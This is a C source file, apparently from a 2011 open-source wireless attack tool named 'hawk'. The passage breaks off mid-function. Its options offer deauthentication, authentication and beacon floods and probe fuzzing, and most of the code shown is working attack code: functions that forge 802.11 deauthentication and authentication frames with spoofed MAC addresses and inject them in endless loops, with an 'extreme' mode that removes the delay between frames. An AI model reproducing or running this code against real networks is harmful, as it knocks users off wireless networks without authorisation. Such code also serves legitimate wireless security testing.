/*  hwk.c
 *  
 *  Copyright 2011 atzeton <atzeton@nullsecurity.net>
 *  
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *  
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU General Public License for more details.
 *  
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
 *  MA 02110-1301, USA.
 */
 
/*   "We have just enough religion to make us hate,   *
 *    but not enough to make us love one another."    *
 *                                 - Jonathan Swift   */

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <linux/wireless.h>
#include <sys/ioctl.h>
#include <string.h>
#include <inttypes.h>
#include <pcap.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <signal.h>
#include <ctype.h>
#include <pthread.h>
#include <time.h>
#include <errno.h>

#include <getopt.h>

#include "../include/radiotap.h"
#include "../include/IEEE802_11.h"
#include "../include/hawk.h"
#include "../include/colors.h"
#include "../include/packet_prototypes.h"


void
exit_err(char *msg)
{
    fprintf(stderr,"%s\n",msg);
    exit(EXIT_FAILURE);
}

void 
print_help()
{
    printf("\nusage:\n\
    [--help|--scan|--deauth|--auth|--focus|--fuzzprobes|--testinject|--beacon|--9]\n\
    [--extreme] [--delay=<sec>] [--channel=channel] [--iface=wlanx]\n\
    \n\
    --help:       show a small help\n\
    --scan:       scanning mode, shows the captured packets and extacts mac addresses and other details\n\
    --deauth:     single deauthentication flood\n\
    --auth:       authentication flood\n\
    --focus:      antenna alignment\n\
    --fuzzprobes: probe response fuzzing\n\
    --testinject: injection testing\n\
    --beacon:     beacon flood\n\
    --9:          multi deauthentication flood\n\
    \n\
    --extreme:  increase flooding\n\
    --delay:    specify --9 delay\n\
    --channel:  set channel\n\
    --iface:    interface\n\n");
    
    exit(EXIT_SUCCESS);
}

                                                                        
int8_t 
optget(int argc, char** argv, OPTS_t *opts) 
{
    int32_t index      = -1;
    struct option * opt = 0;
    int32_t result    = 0;
    
    static const struct option long_options[] = {
        { "help", no_argument,     0, 0 },

        { "scan", no_argument,     0, 0 },
        { "deauth", no_argument,       0, 0 },
        { "fuzzprobes", no_argument,       0, 0 },
        { "auth", no_argument,     0, 0 },
        { "focus", no_argument,    0, 0 },
        { "testinject", no_argument,       0, 0 },      
        { "beacon", no_argument,       0, 0 },
        { "9", no_argument, 0, 0 },
        
        { "iface", required_argument,      0, 0 },
        { "channel", required_argument,    0, 0   },
        
        { "bssid", required_argument, 0, 0   },
        { "client", required_argument, 0, 0   },
        { "dest", required_argument, 0, 0   },
        
        { "delay", required_argument, 0, 0   },
        { "extreme", no_argument, 0, 0   },
        { "ssid", required_argument, 0, 0   },
        {0,0,0,0} 
    };
    
    while (optind < argc) {
        result = getopt_long(argc, argv, "", long_options, &index);
        if (result != 0) {
            exit_err("error: getopt_long failed");
        }
        else if( result == 0) {
            opt = (struct option *)&(long_options[index]);
                
            if( strcmp(opt->name,"help") == 0) {
                print_help();
            }
            else if( strcmp(opt->name,"scan") == 0 ) {
                opts->mode = HWK_MODE_SCAN;
            }
            else if( strcmp(opt->name,"deauth") == 0 ) {
                opts->mode = HWK_MODE_DEAUTH;
            }
            else if( strcmp(opt->name,"auth") == 0 ) {
                opts->mode = HWK_MODE_AUTH;
            }
            else if( strcmp(opt->name,"focus") == 0 ) {
                opts->mode = HWK_MODE_FOCUS;
            }
            else if( strcmp(opt->name,"fuzzprobes") == 0 ) {
                opts->mode = HWK_MODE_FUZZPROBES;
            }
            else if( strcmp(opt->name,"testinject") == 0 ) {
                opts->mode = HWK_MODE_TESTINJECT;
            }
            else if( strcmp(opt->name,"beacon") == 0 ) {
                opts->mode = HWK_MODE_BEACON;
            }
            else if( strcmp(opt->name,"9") == 0 ) {
                opts->mode = HWK_MODE_666_9;
            }
            else if( strcmp(opt->name,"extreme") == 0 ) {
                opts->eX7r3m3_fl00d = 1;
            }
            else if( strcmp(opt->name,"delay") == 0 ) {
            if( opt->has_arg == required_argument && atoi(optarg) > 0 ) {
                        opts->twait = (uint32_t)atoi(optarg);
                }
                else {
                    fprintf(stderr,"error: wrong delay given (has to be > 0)\n");
                    exit(EXIT_FAILURE);
                }
            }
            else if( strcmp(opt->name,"ssid") == 0 ) {
                if( opt->has_arg == required_argument ) {
                    opts->ssid = (char *)optarg;
                }
            }
            else if( strcmp(opt->name,"channel") == 0 ) {
                if( opt->has_arg == required_argument && atoi(optarg) < 15 && atoi(optarg) > 0) {
                    opts->channel = (uint16_t)atoi(optarg);
                }
                else {
                    fprintf(stderr,"error: wrong channel set. 802.11a is NOT supported\n");
                    exit(EXIT_FAILURE);
                }
            }
            else if( strcmp(opt->name,"iface") == 0 ) {
                if( opt->has_arg == required_argument && strlen(optarg) < IFNAMSIZ ) {
                    strncpy(opts->device,optarg,strlen(optarg));
                    opts->dev_auto = 0;
                }
                else {
                    exit_err("error: iface not correct");
                }
            }
            else if( strcmp(opt->name,"bssid") == 0 ) {
                if( opt->has_arg == required_argument ) {
                    if( sscanf(
                        optarg,"%02x:%02x:%02x:%02x:%02x:%02x",
                        (uint *)&opts->bssid[0],
                        (uint *)&opts->bssid[1],
                        (uint *)&opts->bssid[2],
                        (uint *)&opts->bssid[3],
                        (uint *)&opts->bssid[4],
                        (uint *)&opts->bssid[5]
                    ) != 6) {
                    printf("error: sscanf failed\n");
                        exit(EXIT_FAILURE);
                    }
                }
            }
            else if( strcmp(opt->name,"client") == 0 ) {
                if( opt->has_arg == required_argument ) {
                    if( sscanf(
                        optarg,"%02x:%02x:%02x:%02x:%02x:%02x",
                        (uint *)&opts->clmac[0],
                        (uint *)&opts->clmac[1],
                        (uint *)&opts->clmac[2],
                        (uint *)&opts->clmac[3],
                        (uint *)&opts->clmac[4],
                        (uint *)&opts->clmac[5]
                            ) != 6) {
                            printf("error: sscanf failed\n");
                            exit(EXIT_FAILURE);
                    }
                }
            }
            else if( strcmp(opt->name,"dest") == 0 ) {
                if( opt->has_arg == required_argument ) {
                    if( sscanf(
                        optarg,"%02x:%02x:%02x:%02x:%02x:%02x",
                        (uint *)&opts->dstmac[0],
                        (uint *)&opts->dstmac[1],
                        (uint *)&opts->dstmac[2],
                        (uint *)&opts->dstmac[3],
                        (uint *)&opts->dstmac[4],
                        (uint *)&opts->dstmac[5]
                        ) != 6) {
                            printf("error: sscanf failed\n");
                            exit(EXIT_FAILURE);
                        }
                }
            }   
        }
    }
    
    return(0);
}


int8_t 
if_get_txpower(int32_t sockfd, char *devname)
{
    struct iwreq wrq;
    strncpy(wrq.ifr_name, devname, sizeof(devname));
    
    if( ioctl(sockfd, SIOCGIWTXPOW, &wrq) < 0) {
        return(-1);
    }
    
    return(wrq.u.txpower.value);
}


/* 2.4 Ghz frequence to channel */
int8_t 
freq2channel(uint16_t freq) 
{
    freq = freq - 2407;
    return((int8_t)(freq/5));
}


uint16_t
channel2freq(uint8_t channel)
{
    uint32_t freq = 2407 + channel*5;
    
    return(freq);
}


int8_t
if_get_channel(int32_t sockfd, char *devname)
{
    struct iwreq wrq;
    strncpy(wrq.ifr_name, devname, sizeof(devname));
    
    if( ioctl(sockfd, SIOCGIWFREQ, &wrq) < 0) {
        return(-1);
    }
    
    return(freq2channel(wrq.u.freq.m));
}


/* transform a seqence number as appearing in the packet into a dec seq */                                                                
uint16_t 
seq2seq(uint16_t seq) 
{
    seq = seq >> 4;
    return(seq);
}       


/* just print out a mac addr */
void 
print_mac_addr(uint8_t *addr)
{
    uint8_t i = 0;
    
    for( i=0; i<6; i++) {
        printf("%02x",(uint)addr[i]);
        if( i != 5) {
            printf(":");
        }
    }
}


int8_t 
opts_have_bssid(OPTS_t *opts) 
{
    if( memcmp(opts->bssid,MAC_ZERO_ADDR,6) == 0) {
        return(-1);
    }
    
    return(0);
}


int8_t 
opts_have_clmac(OPTS_t *opts) 
{
    if( memcmp(opts->clmac,MAC_ZERO_ADDR,6) == 0) {
        return(-1);
    }
    
    return(0);
}


int8_t 
opts_have_dstmac(OPTS_t *opts) 
{
    if( memcmp(opts->dstmac,MAC_ZERO_ADDR,6) == 0) {
        return(-1);
    }
    
    return(0);
}


int8_t 
if_set_channel(char *dev, int8_t channel, int32_t sockfd) 
{
    if( channel == 0) {
        return(0);
    }
    
    struct iwreq *wrq = calloc(1, sizeof(struct iwreq));
    strncpy(wrq->ifr_name, dev, 14);
    
    wrq->u.freq.m = channel;

    if( ioctl(sockfd, SIOCSIWFREQ, wrq) < 0) {
        fprintf(stderr,"warning: if_set_channel (channel %d, iface %s) failed (%s)\n\n",wrq->u.freq.m,dev,strerror(errno));
        free(wrq);
        return(-1);
    }
    
    free(wrq);
    
    return(0);
}
    
    
/* walk through all channels, used for scanning for a specific bssid */     
void
*ch_walkthrough(void *arg)
{   
    OPTS_t *opts = (OPTS_t *)arg;
    uint8_t         i;
    
    for(i=0; i < sizeof(channels); i++) {
        /* line redraw for progress bar */
        clear_line();
        printf("> scanning  [ %2u]\n",(uint)channels[i]);

        if_set_channel(opts->device,channels[i], opts->sockfd);
        
        /* wait a few microseconds */
        (void)usleep(CHWALKTHROUGH);
    }
    
    opts->scan_done = 1;
    return(NULL);
}

/* permanent (means not for scanning) channel hopping */
void
*ch_perm_hop(void *arg)
{   
    OPTS_t *opts = (OPTS_t *)arg;
    uint8_t i   = 0;
    
    while(TRUE) {
        for(i= 0; i < sizeof(channels); i++) {
            if_set_channel(opts->device,channels[i], opts->sockfd);

            (void)usleep(CHWALKTHROUGH);
        }
    }
    
    return( NULL ); 
}


/* seqence number catching thread             */
/* It also works without but ... not that well */
void *
seqalyzer(void *arg)
{
    struct pcap_pkthdr  hdr;
    OPTS_t *opts            = (OPTS_t *)arg;
    uint8_t w80211_type  = 0;
    const uint8_t     *pkt = NULL;
    char *ssid            = NULL;
    
    /* stuff below is used for packet parsing */
    IEEE80211_FCTRL_t *w80211fctrl = NULL;
    IEEE80211_BEACON_t *w80211mac  = NULL;
    IEEE80211_ACK_t *ack           = NULL;
    IEEE80211_AUTH_t *auth       = NULL;
    RADIOTAP_CONTROL_t *rctrl = radiotap_init();    
    
    memset(&hdr,0x00,sizeof(struct pcap_pkthdr)); /* splint complained about bzero ;) ) */
    
    while(TRUE) {
        /* grab the packet from pcap */
        pkt = (uint8_t *)pcap_next(opts->pcapd,&hdr);
        if( pkt != NULL ) {
            opts->pkt_sum++;
            /* parse the radiotap header */
            if( radiotap_parse(pkt, rctrl) < 0) {
                printf("warning: radiotap parsing failed\n");
            }
            
            /* used for debugging channel hopping, this complains when the channel changed during runtime
             * e.g. if airodump which also does channel hopping runs in the background */
            if( rctrl->rpflags.channel == 0x01 ) {
                if( freq2channel(rctrl->rtap.channel) != opts->channel ) {
                    opts->channel_changed = 1;
                }
                else if( freq2channel(rctrl->rtap.channel) == opts->channel ) {
                    opts->channel_changed = 0;
                }
            }

            /* parse the wifi control header which is part of the wlan header */ 
            w80211fctrl = (IEEE80211_FCTRL_t *)(pkt + radiotap_get_total_length(rctrl));

            /* get the type, see IEEE802_11.h for examples ( 0x80 = BEACON ... ) or just use wireshark like I did ;)*/
            w80211_type = (uint8_t) (w80211fctrl->subtype | w80211fctrl->type<<4);
            
            /* get the sequence numer from BEACONs and DATAs and count ACKs */
            if( w80211_type == IEEE80211_BEACON || w80211_type == IEEE80211_DATA) {
                w80211mac = (IEEE80211_BEACON_t *)(pkt + radiotap_get_total_length(rctrl));
                
                if( memcmp(w80211mac->bssid,opts->bssid,6) == 0 || memcmp(w80211mac->src,opts->bssid,6) == 0 ) {
                    opts->current_seq = w80211mac->seq >> 4;
                    
                    if( rctrl->rpflags.channel == 0x01) {
                        opts->ssi_signal = rctrl->rtap.dbm_signal;
                    }
                    
                    switch(w80211_type) {
                        case IEEE80211_BEACON:
                            opts->pkt_beacons++;
                            break;
                        case IEEE80211_DATA:
                            opts->pkt_data++;
                            break;
                    }
                }   
            }
            else if( w80211_type == IEEE80211_ACK ) {
                ack = (IEEE80211_ACK_t *)(pkt + radiotap_get_total_length(rctrl) + FCTRL_SIZE );
                if( memcmp(ack->dst,opts->clmac,6) == 0 ) {
                    opts->pkt_ack++;
                }
            }
            /* oh, and count auths */
            else if( w80211_type == IEEE80211_AUTHENTICATION ) {
                auth = (IEEE80211_AUTH_t *) (pkt + radiotap_get_total_length(rctrl) + FCTRL_SIZE );
                if( memcmp(auth->dst,opts->clmac,6) == 0 ) {
                    opts->current_seq = auth->seq >> 4;
                }
            
            }
        }
        (void)usleep(1);
    }
    free(ssid);
    pkt = NULL;
    free(rctrl);
}


/* allocate space for the radiotap header */    
RADIOTAP_CONTROL_t
*radiotap_init() 
{
    return( calloc(1, sizeof(RADIOTAP_CONTROL_t) ) );
}


/* parse the radiotap header */
int8_t 
radiotap_parse(const uint8_t *pkt, RADIOTAP_CONTROL_t *rmanage) 
{   
    RADIOTAP_PREAMBLE_t *rpre  = NULL;
    RADIOTAP_PFLAGS_t *rpflags = NULL;
    size_t iterator         = sizeof(RADIOTAP_PREAMBLE_t);
    
    rpre = (RADIOTAP_PREAMBLE_t *)pkt;          /* first parse the preable which is always the same  */
    rpflags = (RADIOTAP_PFLAGS_t *)&rpre->pflags; /* rpflags is a bitmap indicating the present fields */
    
    memcpy(&rmanage->rpre,rpre,sizeof(RADIOTAP_PREAMBLE_t));
    memcpy(&rmanage->rpflags,rpflags,sizeof(RADIOTAP_PFLAGS_t));
    
    /* time sync */
    if( rpflags->tsft == 0x01 ) {
        memcpy(&rmanage->rtap.tsft,&pkt[iterator],8);
        iterator += sizeof(uint64_t);
    }
            
    /* channel flags */
    if( rpflags->flags == 0x01 ) {
        memcpy(&rmanage->rtap.flags,&pkt[iterator],1);
        iterator += sizeof(uint8_t);
    }
            
    /* rate */
    if( rpflags->rate == 0x01 ) {
        memcpy(&rmanage->rtap.rate,&pkt[iterator],1);
        iterator += sizeof(uint8_t);
    }
    
    /* channel */   
    if( rpflags->channel == 0x01) {
        memcpy(&rmanage->rtap.channel,&pkt[iterator],2);
        iterator += sizeof(uint16_t);
            }
    
    /* frequency hopping */
    if( rpflags->fhss == 0x01 ) {
        memcpy(&rmanage->rtap.rate,&pkt[iterator],2);
        iterator += sizeof(uint16_t);
    }
    
    /* */
    if( rpflags->flags == 0x01 ) {
        memcpy(&rmanage->rtap.flags,&pkt[iterator],2);
        iterator += sizeof(uint16_t);
    }
    
    if( rpflags->dbm_signal == 0x01 ) {
        memcpy(&rmanage->rtap.dbm_signal,&pkt[iterator],1);
        iterator += sizeof(int8_t);
    }
    
    if( rpflags->dbm_noise == 0x01 ) {
        memcpy(&rmanage->rtap.dbm_noise,&pkt[iterator],1);
        iterator += sizeof(int8_t);
    }
    
    /* barker lock quality */
    if( rpflags->lockqa == 0x01 ) {
        memcpy(&rmanage->rtap.lock_quality,&pkt[iterator],2);
        iterator += sizeof(uint16_t);
    }
    
    if( rpflags->txatt == 0x01 ) {
        memcpy(&rmanage->rtap.tx_attenuation,&pkt[iterator],2);
        iterator += sizeof(uint16_t);
    }
    
    if( rpflags->dbtxatt == 0x01 ) {
        memcpy(&rmanage->rtap.db_tx_attenuation,&pkt[iterator],2);
        iterator += sizeof(uint16_t);
    }
    
    if( rpflags->dbm_tx_power == 0x01 ) {
        memcpy(&rmanage->rtap.dbm_tx_power,&pkt[iterator],1);
        iterator += sizeof(uint8_t);
    }
    
    if( rpflags->antenna == 0x01 ) {
        memcpy(&rmanage->rtap.antenna,&pkt[iterator],1);
        iterator += sizeof(uint8_t);
    }
    
    if( rpflags->db_signal == 0x01 ) {
        memcpy(&rmanage->rtap.db_signal,&pkt[iterator],1);
        iterator += sizeof(uint8_t);
    }
    
    if( rpflags->db_noise == 0x01 ) {
        memcpy(&rmanage->rtap.db_noise,&pkt[iterator],1);
        iterator += sizeof(uint8_t);
    }
    
    if( rpflags->rx_flags == 0x01 ) {
        memcpy(&rmanage->rtap.rx_flags,&pkt[iterator],2);
        iterator += sizeof(uint16_t);
    }
    
    /* well, where are channel+ and exensions field?  ;) */
    
    return(0);
}


/* get the length of the radiotap header */
uint16_t 
radiotap_get_total_length(RADIOTAP_CONTROL_t *rmanage) 
{
    return(rmanage->rpre.hlen);
}


/* get the channel of specific BSSID */     
int16_t
get_channel(OPTS_t *opts) 
{
    uint8_t w80211_type = 0;
    int8_t scan_done    = 0;
    uint8_t tag_len  = 0;
    uint8_t tag_id    = 0;
    uint32_t i        = 0;
    time_t time_start   = 0;
    int16_t ret_val  = 0;
    
    char *ssid        = NULL;
    const uint8_t  *pkt = NULL;
    struct pcap_pkthdr  hdr;    

    IEEE80211_FCTRL_t *w80211fctrl = NULL;
    IEEE80211_BEACON_t *w80211mac  = NULL;

    pthread_t trd;
    RADIOTAP_CONTROL_t *rmanage = radiotap_init();
    
    time_start = time(NULL);
    if( pthread_create(&trd, NULL, ch_walkthrough, (void *)opts) != 0) {
        printf("warning: channel walkthrough thread cannot be started\n");
    }
    
    
    while( (( time(NULL) - time_start) < 15 ) ) {   /* until 15 sec are gone     */
        
        if( scan_done == 1) {                      /* scan finished before a channel has been found */
            free((void *)rmanage);
            return(-1);
        }
        
        pkt = (uint8_t *)pcap_next(opts->pcapd,&hdr);/* jack pcap's packet      */
        if( pkt != NULL ) {
            if( radiotap_parse(pkt, rmanage) < 0) {  /* parse the radiotap header */
                printf("warning: radiotap header parsingfailed\n");
            }
            
            w80211fctrl = (IEEE80211_FCTRL_t *)(pkt + radiotap_get_total_length(rmanage));

            w80211_type = (uint8_t)(w80211fctrl->subtype | w80211fctrl->type<<4);
            
            if( w80211_type == IEEE80211_BEACON) {
                w80211mac = (IEEE80211_BEACON_t *)(pkt + radiotap_get_total_length(rmanage));

                if( memcmp(opts->bssid,w80211mac->bssid,6) == 0) {
                    i = (uint32_t)radiotap_get_total_length(rmanage) + (uint32_t)sizeof(IEEE80211_BEACON_t)+ (uint32_t)sizeof(IEEE80211_BEACON_FIXEDPARAM_t);
                    while(i < (uint32_t)(hdr.len-4)) {
                        tag_id = pkt[i];
                        tag_len = pkt[i+1];             
                        if(tag_id == IEEE80211_BEACON_TAGGED_SSID) {
                            free(ssid);
                            ssid = calloc(1,(size_t)tag_len);
                            memcpy(ssid,&pkt[i+2],(size_t)tag_len);
                            i += tag_len+2;
                            opts->ssid = ssid;
                            continue;
                        }
                        else if(tag_id == IEEE80211_BEACON_TAGGED_CHANNEL) {
                            /* true channel is only set in the beacon */
                            if( tag_len == 1) {
                                pthread_cancel(trd);
                                
                                ret_val = (int16_t)pkt[i+2];
                                
                                pkt = NULL;
                                free( rmanage );
                                return( ret_val );
                                
                            }
                            i += tag_len+2;
                            continue;
                        }
                        else {
                            i += tag_len+2;
                            continue;
                        }
                    }
                    
                    memset(ssid, 0x00, tag_len+2);
                }   
            }
        }
    }
    
    pkt = NULL;
    free(rmanage);
    
    if( pthread_cancel(trd) != 0 ) {
        printf("warning: walthrough thread cannot be canceled\n");
    }
    
    fprintf(stderr,"error: no beacon captured :(\n");
    exit(EXIT_FAILURE);
}       

/* get a beacon frame
 * - to parse the current seq
 * - to print out the SSID
 * - to just scan if the BSSID exists */
int8_t
get_beacon(OPTS_t *opts) 
{
    const uint8_t     *pkt       = NULL;        
    IEEE80211_FCTRL_t  *w80211fctrl = NULL;
    IEEE80211_BEACON_t *w80211mac   = NULL;
    RADIOTAP_CONTROL_t *rmanage  = NULL;
    time_t time_start              = 0;
    uint8_t w80211_type          = 0;
    struct pcap_pkthdr  hdr;    
    
    time_start = time(NULL);
    rmanage = radiotap_init();
    
    while(( time(NULL) - time_start) < 5 ) { /* only wait 5 sec */
        pkt = (uint8_t *)pcap_next(opts->pcapd,&hdr);
        if( pkt != NULL ) {
                if( radiotap_parse(pkt, rmanage) < 0) {
                    printf("warning: radiotap parse failed\n");
                }
            
                w80211fctrl = (IEEE80211_FCTRL_t *)(pkt + radiotap_get_total_length( rmanage ));

                w80211_type = (uint8_t)(w80211fctrl->subtype | w80211fctrl->type<<4);
            
                if( w80211_type == IEEE80211_BEACON) {
                    w80211mac = (IEEE80211_BEACON_t *)(pkt + radiotap_get_total_length(rmanage));
                    
                    if( memcmp(opts->bssid, w80211mac->bssid, 6) == 0) {
                        opts->current_seq = w80211mac->seq >> 4;
                        pkt = NULL;
                        free( rmanage );
                        return(0);
                    }
                    
                }
        }
    }
    
    free( rmanage );
    pkt  = NULL;
    rmanage = NULL;
    return(-1); 
}


/* inject deauth frames */
void *
inject_deauth(void *arg) 
{
    OPTS_t  *opts   = NULL;
    uint8_t *packet = NULL;
    
    int32_t inj_success = 0;
    uint8_t i          = 0;
    size_t size      = 0;
    
    IEEE80211_DEAUTH_t *deauth = NULL;
    
    opts = (OPTS_t *)arg;
    size = sizeof(IEEE80211_DEAUTH2);
    packet = calloc(1, sizeof(IEEE80211_DEAUTH2));

    memcpy(packet,IEEE80211_DEAUTH2,sizeof(IEEE80211_DEAUTH2));
    deauth = (IEEE80211_DEAUTH_t *) (packet + RADIOTAP_PREAMBLE_SIZE + RADIOTAP_RESTRICED_SIZE + FCTRL_SIZE );

    memcpy(deauth->dst,opts->dstmac,6);
    memcpy(deauth->src,opts->clmac,6);
    memcpy(deauth->bssid,opts->bssid,6);
    deauth->duration = 0x0010;
    
    while(TRUE) {
        for(i=1; i<4; i++) { 
            deauth->seq = (opts->current_seq + i) << 4;
            inj_success = (int32_t)pcap_inject(opts->pcapd, packet, size-1);
            if( inj_success < 0) {
                printf("warning: injection softwareside failed\n");
            }
        }
        
        opts->pkt_injected += 3;
        
        if( opts->eX7r3m3_fl00d != 1) {
            (void)usleep(50000);
        }
        
    }
}


/* inject auth packets - for auth flood */
void *
inject_auth(void *arg) 
{
    OPTS_t *opts                  = NULL; 
    IEEE80211_AUTH_t *auth      = NULL;
    IEEE80211_AUTH_FIXED_t *fixed = NULL;
    uint8_t *packet            = NULL;
    size_t size                = sizeof(IEEE80211_AUTH);
    int32_t inj_success        = 0;
    
    opts = (OPTS_t *)arg;
    
    packet = calloc(1, sizeof(IEEE80211_AUTH));
    memcpy(packet,IEEE80211_AUTH,sizeof(IEEE80211_AUTH));

    auth = (IEEE80211_AUTH_t *) (packet + RADIOTAP_PREAMBLE_SIZE + RADIOTAP_RESTRICED_SIZE + FCTRL_SIZE);

    fixed = (IEEE80211_AUTH_FIXED_t *) (packet + RADIOTAP_PREAMBLE_SIZE + RADIOTAP_RESTRICED_SIZE + FCTRL_SIZE + sizeof(IEEE80211_AUTH_t));
    
    memcpy(auth->src,opts->clmac,6);
    memcpy(auth->bssid,opts->bssid,6);
    memcpy(auth->dst,opts->dstmac,6);
    auth->duration = 0x0001;
    fixed->seq   = 0x0001;
    
    while(TRUE) {
        auth->seq = (opts->current_seq + 1) << 4;
        fixed->seq = 0x0001;
        inj_success = (int32_t)pcap_inject(opts->pcapd, packet, size);
        
        auth->seq = (opts->current_seq + 1) << 4;
        fixed->seq = 0x0002;
        inj_success = (int32_t)pcap_inject(opts->pcapd, packet, size);
        
        opts->pkt_injected +=2;
        
        if( opts->eX7r3m3_fl00d != 1) {
            (void)usleep(50000);
        }
    }
        
    free(packet);
}


/* clear line */
void 
clear_line()
{
    printf("\033[1A");
    printf("\033[0K");
}


/* test if injection works 
 * this is done by sending a probe request and wait if the response/ack
 * arrives */
int8_t
test_inject(OPTS_t *opts) 
{
    struct pcap_pkthdr  hdr;    
    const uint8_t     *pkt_recv     = NULL;
    IEEE80211_FCTRL_t *w80211fctrl    = NULL;
    IEEE80211_PROBE_RESPONSE_t *presp   = NULL;
    IEEE80211_ACK_t *ack                = NULL;
    RADIOTAP_CONTROL_t *rmanage      = NULL;
    IEEE80211_PROBE_REQUEST_t *probereq = NULL;
    time_t time_start   = 0;
    uint32_t i        = 0;
    uint8_t w80211_type = 0;
    
    uint8_t pkt[] = { 0x00,0x00,0x0d,0x00,0x04,0x80,0x00,0x00,0x02,0x00\
      ,0x18,0x00,0x00,0x40,0x00,0x00,0x00,0xff,0xff,0xff,0xff,0xff,0xff\
      ,0x00,0x3e,0x7f,0x8c,0x5d,0xde,0xff,0xff,0xff,0xff,0xff,0xff,0x20\
      ,0x00,0x00,0x00,0x01,0x04,0x02,0x04,0x0b,0x16,0x32,0x08,0x0c,0x12\
      ,0x18,0x24,0x30,0x48,0x60,0x6c};
      
    rmanage = calloc(1,(size_t)56);
    
    probereq = (IEEE80211_PROBE_REQUEST_t *)(pkt + RADIOTAP_PREAMBLE_SIZE + RADIOTAP_RESTRICED_SIZE + FCTRL_SIZE);
    
    memcpy(probereq->src,opts->mac_fake_addr,6);
    memcpy(probereq->bssid, opts->bssid,6);
    probereq->duration = 0x0000;
    probereq->seq     = 0x0000;

    for( i=0; i<2; i++) {
        (void)pcap_inject(opts->pcapd, (const uint8_t *)pkt, sizeof(pkt));
        time_start = time(NULL);
        
        while( (( time(NULL) - time_start) < 2 ) ) {
            pkt_recv = (uint8_t *)pcap_next(opts->pcapd,&hdr);
            if( pkt_recv != NULL ) {
                if( radiotap_parse(pkt_recv, rmanage) < 0) {
                    printf("warning:radiotap parse failed\n");
                }

                w80211fctrl = (IEEE80211_FCTRL_t *)(pkt_recv + radiotap_get_total_length(rmanage));
                w80211_type = (uint8_t)(w80211fctrl->subtype | w80211fctrl->type<<4);
            
                if( w80211_type == IEEE80211_PROBE_RESPONSE) {
                    presp = (IEEE80211_PROBE_RESPONSE_t *)(pkt_recv + radiotap_get_total_length(rmanage) + FCTRL_SIZE);
                    if( memcmp(presp->dst,opts->mac_fake_addr,6) == 0) {
                        free(rmanage);
                        return(0);
                    }
                }
                else if( w80211_type == IEEE80211_ACK) {
                    ack = (IEEE80211_ACK_t *)(pkt_recv + radiotap_get_total_length(rmanage) + FCTRL_SIZE);
                    if( memcmp(ack->dst,opts->mac_fake_addr,6) == 0) {
                        free(rmanage);
                        return(1);
                    }
                }

            }
            (void)usleep(1);
        }
    }
    
    pkt_recv = NULL;
    free(rmanage);
    
    return(-1);
}


/* compute mac fake addr, for the probe request */
uint8_t 
*calc_mac_fake_addr(void)
{
    uint8_t i = 0;
    
    uint8_t *mfa = calloc(1, 6);
    if ( mfa == NULL) {
        free(mfa);
        return(NULL);
    }
    
    for(i=0; i<6; i++) {
        memset(&mfa[i], rand(), 1);
    }
    
    return(mfa);
}


/* the only useful function in this tool, focus on a station and print out the signal */
int8_t
focus(OPTS_t *opts) 
{
    struct pcap_pkthdr  hdr;    
    uint8_t w80211_type          = 0;
    const uint8_t     *pkt_recv = NULL;
    
    IEEE80211_FCTRL_t *w80211fctrl  = NULL;
    IEEE80211_DATA_t *data        = NULL;
    IEEE80211_PROBE_REQUEST_t *preq = NULL;
    IEEE80211_BEACON_t *beacon    = NULL;
    RADIOTAP_CONTROL_t *rmanage  = radiotap_init();
    
    printf("> starting station focus mode (only beacons, data and probe requests will be reported)\n");
    if( memcmp(opts->clmac,MAC_ZERO_ADDR,6) == 0) {
        printf("error: no mac set (-s)\n");
        free(rmanage);
        exit(EXIT_FAILURE);
    }
    if( opts->channel == 0) {
        printf("error: no channel set (--channel)\n");
        free(rmanage);
        exit(EXIT_FAILURE);
    }
    
    if_set_channel(opts->device, opts->channel, opts->sockfd);

    printf("\n\n");
    
    while(TRUE) {
        pkt_recv = (uint8_t *)pcap_next(opts->pcapd,&hdr);
        
        if( pkt_recv != NULL ) {
            if( radiotap_parse(pkt_recv, rmanage) < 0) {
                printf("radiotap parse failed\n");
            }

            w80211fctrl = (IEEE80211_FCTRL_t *)(pkt_recv + radiotap_get_total_length(rmanage));
            w80211_type = (uint8_t)(w80211fctrl->subtype | w80211fctrl->type<<4);
            
            if( w80211_type == IEEE80211_DATA) {
                data = (IEEE80211_DATA_t *)(pkt_recv + radiotap_get_total_length(rmanage) +2 );
                if( memcmp(data->src,opts->clmac,6) == 0) {
                    clear_line();
                    if( rmanage->rpflags.dbm_signal == 0x01 ) {
                        printf("> ");
                        print_timestamp();
                        printf(" ");
                        print_mac_addr(opts->clmac);
                        printf(" [ %4ddbm ]\n",(int)rmanage->rtap.dbm_signal);
                    }
                    if( rmanage->rpflags.db_signal == 0x01) {
                        printf("> ");
                        print_timestamp();
                        printf(" ");
                        print_mac_addr(opts->clmac);
                        printf(" [ %4ddb ]\n",(int)rmanage->rtap.dbm_signal);
                    }
                }
            }       
            else if( w80211_type == IEEE80211_BEACON) {
                beacon = (IEEE80211_BEACON_t *)(pkt_recv + radiotap_get_total_length(rmanage));
                if( memcmp(beacon->src,opts->clmac,6) == 0) {
                    if( rmanage->rpflags.dbm_signal == 0x01 ) {
                        clear_line();
                        printf("> ");
                        print_timestamp();
                        printf(" ");
                        print_mac_addr(opts->clmac);
                        printf(" [ %4ddbm ]",(int)rmanage->rtap.dbm_signal);
                        printf("\n");
                    }
                    if( rmanage->rpflags.db_signal == 0x01) {
                        clear_line();
                        printf("> ");
                        print_timestamp();
                        printf(" ");
                        print_mac_addr(opts->clmac);
                        printf(" [ %4ddb ]",(int)rmanage->rtap.dbm_signal);
                        printf("\n");
                    }
                }
            }
            
            else if( w80211_type == IEEE80211_PROBE_REQUEST ) {
                preq = (IEEE80211_PROBE_REQUEST_t *)(pkt_recv + radiotap_get_total_length(rmanage) +2 );
                if( memcmp(preq->src,opts->clmac,6) == 0) {
                    if( rmanage->rpflags.dbm_signal == 0x01 ) {
                        clear_line();
                        printf("> ");
                        print_timestamp();
                        printf(" ");
                        print_mac_addr(opts->clmac);
                        printf(" [ %4ddbm ]",(int)rmanage->rtap.dbm_signal);
                        printf("\n");
                    }
